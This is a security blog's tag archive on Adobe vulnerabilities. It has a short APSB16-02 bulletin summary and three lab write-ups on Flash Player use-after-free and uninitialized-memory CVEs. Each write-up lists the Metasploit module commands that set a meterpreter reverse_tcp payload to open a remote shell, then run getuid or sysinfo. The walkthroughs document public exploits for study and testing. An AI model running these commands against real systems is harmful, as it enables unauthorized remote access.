Tag Archives: Adobe

APSB16-02 – Adobe Acrobat and Reader Security Bulletin Review

Vulnerability Management, , ,

Adobe has release, the January 12th 2016, during his January Patch Tuesday, one Adobe Acrobat and Reader security bulletin dealing with 17 vulnerabilities. This security bulletin has a Critical severity rating.

APSB16-02 is concerning:

  • Acrobat DC 15.009.20077 and earlier versions on Windows and Macintosh
  • Acrobat Reader DC 15.009.20077 and earlier versions on Windows and Macintosh
  • Acrobat DC 15.006.30097 and earlier versions on Windows and Macintosh
  • Acrobat Reader DC 15.006.30097 and earlier versions on Windows and Macintosh
  • Acrobat XI 11.0.13 and earlier versions on Windows and Macintosh
  • Reader XI 11.0.13 and earlier versions on Windows and Macintosh

CVE-2015-0311 Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free

Exploits, Metasploit, , , , , ,

Timeline :

Vulnerability discovered exploited in the wild the 2015-01-21
Patched by the vendor the 2015-01-22
Metasploit PoC provided the 2015-03-09

PoC provided by :

Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0311
APSA15-01

Affected version(s) :

Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh
Adobe Flash Player 13.0.0.262 and earlier 13.x versions
Adobe Flash Player 11.2.202.438 and earlier versions for Linux

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash Player 16.0.0.287

Description :

This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on:
* Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Flash 11.2.202.424.

Commands :

use exploit/multi/browser/adobe_flash_uncompress_zlib_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2015-0359 Adobe Flash Player domainMemory ByteArray Use After Free

Exploits, Metasploit, , , ,

Timeline :

Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor the 2015-04-14
Vulnerability discovered integrated into exploit kit the 2015-04-17
PoC provided by unknown and hdarwin the 2015-05-02
Metasploit PoC provided the 2015-05-08

PoC provided by :

bilou
Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0359
APSB15-06

Affected version(s) :

Adobe Flash Player 17.0.0.134 and earlier versions

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134

Description :

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Commands :

use exploit/windows/browser/adobe_flash_domain_memory_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

llowfullscreen=”allowfullscreen”>

CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Exploits, Metasploit, , , ,

Timeline :

Vulnerability discovered by bilou and reported to Verisign’s iDefense VCP
Vulnerability reported to the vendor by Verisign’s iDefense VCP the 2014-09-03
Patched by the vendor via APSB14-24 the 2014–11-11
Vulnerability reported integrated into exploit kits the 2014-11-20
Metasploit PoC provided the 2015–04-30

PoC provided by :

Nicolas Joly (bilou ?)
Unknown
juan vazquez

Reference(s) :

CVE-2014-8440
APSB14-24

Affected version(s) :

Adobe Flash Player 15.0.0.189 and earlier versions
Adobe Flash Player 13.0.0.250 and earlier 13.x versions
Adobe Flash Player 11.2.202.411 and earlier versions for Linux
Adobe AIR desktop runtime 15.0.0.293 and earlier versions
Adobe AIR SDK 15.0.0.302 and earlier versions
Adobe AIR SDK & Compiler 15.0.0.302 and earlier versions
Adobe AIR 15.0.0.293 and earlier versions for Android

Tested on :

with Adobe Flash Player 15.0.0.189 and Internet Explorer 11 on Windows 7 SP1

Description :

This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo